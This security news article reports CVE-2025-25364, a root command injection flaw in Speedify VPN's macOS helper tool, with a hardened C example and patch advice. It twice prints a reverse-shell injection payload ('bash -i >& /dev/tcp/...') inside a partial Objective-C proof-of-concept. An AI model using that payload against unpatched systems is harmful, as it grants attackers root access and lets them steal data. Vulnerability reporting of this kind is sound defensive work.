
Speedify VPN Vulnerability on macOS Exposes Users to System Takeover

A major security flaw in the Speedify VPN application for macOS, tracked as CVE-2025-25364, has exposed millions of users to the risk of complete system compromise.

Researchers at SecureLayer7 discovered the vulnerability in Speedify’s privileged helper tool. It could potentially allow local attackers to execute arbitrary commands as root and take total control of affected systems.

CVE-2025-25364: A Critical Command Injection Vulnerability

The root of the problem lies within the me.connectify.SMJobBlessHelper XPC service—a helper tool that runs with elevated (root) privileges to perform system-level network operations for Speedify.

This service, installed as a privileged daemon via /Library/PrivilegedHelperTools/me.connectify.SMJobBlessHelper, is configured to receive and process commands from the main Speedify app via Apple’s XPC messaging system.

CVE ID: CVE-2025-25364
Affected Product: Speedify VPN
Affected Version: 15.0.0 (macOS)
Patched Version: 15.4.1
Component: me.connectify.SMJobBlessHelper (Privileged Helper Tool at /Library/PrivilegedHelperTools/)
Vulnerability Type: Command Injection

Due to improper input validation, particularly of the cmdPath and cmdBin fields in incoming XPC messages, a local attacker can craft a malicious payload.

These fields are directly embedded into the command execution logic without sanitization, enabling an attacker to inject arbitrary shell commands, which the helper tool then executes with root privileges.

Three key functions are at the heart of this vulnerability:

  1. XPC Message Handler: Accepts and parses incoming XPC messages, directing those with a “runSpeedify” request to a launch handler with no input validation.
  2. _handleLaunchSpeedifyMsg: Extracts cmdPath and cmdBin directly from the input and initiates program execution.
  3. _RunSystemCmd: Constructs a shell command from these fields and calls system() to execute it. This line illustrates the injection risk:

rax = asprintf(&var_38, "codesign -v -R=\"certificate leaf[subject.CN] = \"%s\" and anchor apple generic\" \"%s\"", "…", rcx);

A threat actor can set cmdBin or cmdPath to a string such as `"; bash -i >& /dev/tcp/127.0.0.1/1339 0>&1; echo "` to open a root shell connection to an external server.
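As an added illustration (not Speedify's code and not the researchers' PoC), the same codesign check written the way a privileged helper should perform it: the field is validated against a strict allowlist and then handed to execv as one argv element, so it is never interpolated into a shell string for system(). EXPECTED_CN, the allowed path characters and the return codes are assumptions made for this example.

```c
#include <ctype.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

#define MAX_ARG 1024
#define MAX_ARGV 8

/* Allowlist check for a value that will be used as a single path argument.
 * Accepts only an absolute path made of [A-Za-z0-9/._-] with no ".." so the
 * caller can neither inject shell syntax nor point at an unexpected binary. */
int is_safe_path_arg(const char *s) {
    if (s == NULL || s[0] != '/' || strlen(s) >= MAX_ARG) return 0;
    for (const unsigned char *p = (const unsigned char *)s; *p; p++) {
        if (!isalnum(*p) && *p != '/' && *p != '.' && *p != '_' && *p != '-')
            return 0;
    }
    return strstr(s, "..") == NULL;
}

/* Build the codesign invocation as an argv vector instead of a shell string.
 * Each field is exactly one argument, so ';', '"' or '>' inside it are data,
 * never shell syntax. EXPECTED_CN is a placeholder for the signer name the
 * article elides. Returns the argument count (excluding the NULL). */
int build_codesign_argv(const char *cmd_bin, const char *argv_out[MAX_ARGV]) {
    argv_out[0] = "/usr/bin/codesign";
    argv_out[1] = "-v";
    argv_out[2] = "-R=certificate leaf[subject.CN] = \"EXPECTED_CN\" and anchor apple generic";
    argv_out[3] = cmd_bin;
    argv_out[4] = NULL;
    return 4;
}

/* Hardened replacement for a system()-based check: validate first, then
 * execute directly with execv (no shell). Returns -1 if the input is
 * rejected, -2 on a spawn failure, otherwise codesign's exit status. */
int verify_signature(const char *cmd_bin) {
    const char *argv[MAX_ARGV];
    if (!is_safe_path_arg(cmd_bin)) return -1;
    build_codesign_argv(cmd_bin, argv);
    pid_t pid = fork();
    if (pid < 0) return -2;
    if (pid == 0) {
        execv(argv[0], (char *const *)argv);
        _exit(127);            /* exec failed; report like a shell would */
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0) return -2;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -2;
}
```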

Researchers released a proof-of-concept (PoC) exploit written in Objective-C, using the XPC APIs to connect to the vulnerable helper and send a crafted payload.

The payload triggers arbitrary code execution as root, such as spawning a reverse shell. Here’s a relevant snippet:

xpc_dictionary_set_string(message, "cmdPath", "/tmp");
const char *injectionPayload = "\"; bash -i >& /dev/tcp/127.0.0.1/1339 0>&1; echo \"";
xpc_dictionary_set_string(message, "cmdBin", injectionPayload);

The impact of this flaw is critical: an attacker with local access could gain full root control, modify sensitive files, install persistent malware, and exfiltrate data.

Since most Speedify VPN users rely on the app for privacy, this vulnerability could have undermined the security of a broad user base.

Speedify users are strongly advised to upgrade to version 15.4.1 or above, which addresses the flaw with a complete helper tool rewrite, stricter input validation, and the removal of insecure XPC handling.

The incident highlights the paramount importance of rigorous input validation in all privileged code.


Divya

Divya is a Senior Journalist at GBhackers covering Cyber Attacks, Threats, Breaches, Vulnerabilities and other happenings in the cyber world.
